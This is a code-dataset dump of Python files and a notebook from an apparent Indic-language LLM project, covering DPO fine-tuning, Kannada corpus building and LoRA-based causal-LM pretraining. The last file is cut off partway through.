# eval_dataset = get_stack_exchange_paired(data_dir="data/evaluation", sanity_check=True)
# eval_dataset = eval_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 4. initialize training arguments:
training_args = TrainingArguments(
per_device_train_batch_size=script_args.per_device_train_batch_size,
per_device_eval_batch_size=script_args.per_device_eval_batch_size,
# max_steps=script_args.max_steps,
num_train_epochs=script_args.num_train_epochs,
logging_steps=script_args.logging_steps,
save_steps=script_args.save_steps,
gradient_accumulation_steps=script_args.gradient_accumulation_steps,
gradient_checkpointing=script_args.gradient_checkpointing,
learning_rate=script_args.learning_rate,
evaluation_strategy="steps",
eval_steps=script_args.eval_steps,
output_dir=script_args.output_dir,
report_to=script_args.report_to,
lr_scheduler_type=script_args.lr_scheduler_type,
warmup_steps=script_args.warmup_steps,
optim=script_args.optimizer_type,
bf16=True,
remove_unused_columns=False,
run_name="dpo_llama2",
)
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=[
"q_proj",
"v_proj",
"k_proj",
"out_proj",
"fc_in",
"fc_out",
"wte",
],
bias="none",
task_type="CAUSAL_LM",
)
# 5. initialize the DPO trainer
dpo_trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=script_args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
peft_config=peft_config,
max_prompt_length=script_args.max_prompt_length,
max_length=script_args.max_length,
)
# 6. train
dpo_trainer.train()
dpo_trainer.save_model(script_args.output_dir)
# 7. save
output_dir = os.path.join(script_args.output_dir, "final_checkpoint")
dpo_trainer.model.save_pretrained(output_dir) | 9,332 | Python | .py | 202 | 40.282178 | 131 | 0.656618 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,516 | generate_text_corpus.py | adithya-s-k_Indic-llm/archives/dataset/generate_text_corpus.py | import argparse
import logging
import os
import pandas as pd
from datasets import load_dataset
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class CorpusCreator:
def __init__(self):
self.output_dir = "./corpus"
def create_sentence_corpus(
self,
hf_dataset,
hf_corpus_path,
text_col,
dataset_split="train",
output_file_name="kannada_sentence_corpus.txt",
):
try:
dataset = load_dataset(hf_dataset,hf_corpus_path,split=dataset_split)
train_df = pd.DataFrame(dataset)
os.makedirs(self.output_dir, exist_ok=True)
corpus_path = os.path.join(self.output_dir, output_file_name)
with open(corpus_path, "w") as file:
for index, value in tqdm(
train_df[text_col].items(), total=len(train_df)
):
file.write(str(value) + "\n")
except Exception as e:
logger.error(f"Error creating the text corpus -> {e}")
return corpus_path
def run(self):
parser = argparse.ArgumentParser(
description="Create a sentence corpus from a Hugging Face dataset."
)
parser.add_argument(
"--hf-dataset",
required=True,
help="Name of the Hugging Face dataset (e.g., 'imdb').",
)
parser.add_argument(
"--hf-corpus-path",
required=False,
help="Name of the path to language inside the dataset"
)
parser.add_argument(
"--text-col",
required=True,
help="Name of the text column in the dataset.",
)
parser.add_argument(
"--dataset-split",
default="train",
help="Dataset split to use (default: 'train').",
)
parser.add_argument(
"--output-file-name",
default="kannada_sentence_corpus.txt",
help="Name of the output corpus file (default: 'kannda_sentence_corpus.txt').",
)
args = parser.parse_args()
self.create_sentence_corpus(
args.hf_dataset, args.hf_corpus_path, args.text_col, args.dataset_split, args.output_file_name
)
if __name__ == "__main__":
corpus_creator = CorpusCreator()
corpus_creator.run()
| 2,474 | Python | .py | 71 | 25.492958 | 106 | 0.575314 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,517 | generate_dataset.ipynb | adithya-s-k_Indic-llm/archives/dataset/generate_dataset.ipynb | {
"cells": [
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"!pip install ipywidgets"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"from huggingface_hub import notebook_login\n",
"from datasets import load_dataset\n",
"notebook_login()"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import json\n",
"import os\n",
"import pandas as pd\n",
"from datasets import load_dataset\n",
"from tqdm import tqdm\n",
"\n",
"# Create the \"output\" folder if it doesn't exist\n",
"output_folder = \"output\"\n",
"os.makedirs(output_folder, exist_ok=True)\n",
"\n",
"dataset_list = [\n",
" {\"hf_datasets\": \"wikimedia/wikipedia\", \"hf_corpus_paths\": \"20231101.kn\"},\n",
" {\"hf_datasets\": \"mc4\", \"hf_corpus_paths\": \"kn\"},\n",
" {\"hf_datasets\": \"uonlp/CulturaX\", \"hf_corpus_paths\": \"kn\"},\n",
"]\n",
"all_data_points = [] # List to store all data points\n",
"\n",
"for dataset_config in dataset_list:\n",
" hf_datasets = dataset_config[\"hf_datasets\"]\n",
" hf_corpus_paths = dataset_config[\"hf_corpus_paths\"]\n",
"\n",
" dataset_identifier = hf_datasets.split(\"/\")[-1] # Consider only the right half after '/'\n",
"\n",
" dataset = load_dataset(hf_datasets, hf_corpus_paths, split=\"train\", trust_remote_code=True)\n",
"\n",
" current_data_points = [] # List to store data points from the current dataset\n",
"\n",
" for data_point in dataset:\n",
" text = data_point[\"text\"]\n",
" source = dataset_identifier # Use the modified dataset identifier\n",
"\n",
" json_entry = {\n",
" \"text\": text,\n",
" \"source\": source\n",
" }\n",
"\n",
" current_data_points.append(json_entry) # Add the data point to the current dataset list\n",
" all_data_points.append(json_entry) # Add the data point to the overall list\n",
"\n",
" # Save the data points from the current dataset to a JSON file in the \"output\" folder\n",
" output_file_path = os.path.join(output_folder, f\"{dataset_identifier}_output.json\")\n",
" with open(output_file_path, \"w\", encoding=\"utf-8\") as json_file:\n",
" json.dump(current_data_points, json_file, ensure_ascii=False, indent=2)\n",
"\n",
" print(f\"Data points from {dataset_identifier} saved to {output_file_path}\")\n",
"\n",
"# Save the overall list of data points to a final JSON file in the \"output\" folder\n",
"final_output_file_path = os.path.join(output_folder, \"all_data_points_output.json\")\n",
"with open(final_output_file_path, \"w\", encoding=\"utf-8\") as json_file:\n",
" json.dump(all_data_points, json_file, ensure_ascii=False, indent=2)\n",
"\n",
"print(f\"All data points saved to {final_output_file_path}\")\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"dataset = load_dataset('json', data_files='./output/wikipedia_output.json' , split='train')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"print(dataset['text'][:10])"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"dataset.push_to_hub(\"CognitiveLab/Project_K_TrainDataset_Small\" ,private=True)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "training-venv",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.9.18"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 4,260 | Python | .py | 139 | 26.467626 | 106 | 0.566367 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,518 | pretrain-gemma.py | adithya-s-k_Indic-llm/archives/pretraining/pretrain-gemma.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = AutoModelForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
# model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,345 | Python | .py | 574 | 40.578397 | 200 | 0.647091 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,519 | pretrain.py | adithya-s-k_Indic-llm/archives/pretraining/pretrain.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
